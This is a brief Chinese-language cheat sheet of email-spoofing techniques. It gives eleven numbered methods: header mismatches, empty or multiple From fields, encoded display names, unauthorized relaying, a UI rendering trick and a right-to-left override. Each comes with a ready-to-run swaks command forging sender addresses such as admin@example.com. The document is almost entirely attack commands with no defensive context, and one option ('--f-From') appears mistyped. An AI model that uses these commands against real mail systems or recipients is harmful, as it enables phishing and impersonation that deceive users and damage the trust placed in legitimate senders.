邮件伪造方法总结

0x01 mail From头与认证用户的用户名不一致

swaks -t target@example.com -b "test" -f faker@example.com  -s server@example.com -au USERNAME -ap PASSWORD

0x02 邮件From头和Mail From头之间不一致

swaks -t target@example.com -f faker@example.com --h-From: '"admin"<admin@example.com>'

0x03 空的Mail From头

swaks -t target@example.com -f " " --h-From: '"admin"<admin@example.com>'

0x04 多级From头

swaks -t target@example.com -f "hr@example.com" -f "hrbak@example.com" --h-From: '"admin"<admin@example.com>'

0x05 From头有多个地址

swaks -t target@example.com -f admin@example.com --h-From:'"admin" <admin@example.com>', '"admin2"<admin2@example.com>' -e server@example.com

0x06 解析具有不一致性的攻击

swaks -t target@example.com -f test1@example.com:test2@example.com --h-From:'"admin"<admin@example.com>'

0x07 基于编码的伪造攻击

swaks -f admin@example.com  -t target@example.com --h-From:'=?utf-8?B?57up5pWI566h55CG?= <admin@example.com>'

0x08 子域攻击

swaks -t target@example.com -f admin@example.com --f-From:'"admin"<admin@example.com>'

0x09 未经授权的转发攻击

swaks -t target@example.com -f admin@example.com --body "test" --h-X-Mailer google.com --server server@example.com -p 2525 -au USERNAME -ap PASSWORD

0x10 缺少UI渲染攻击

swaks -t target@example.com -f admin@example.com --h-From:'admin@go@ogle.com'

0x11 RTL覆盖攻击

swaks -t target@example.com -f admin@example.com --h-From:'\u202emoc.a@\u202dalice'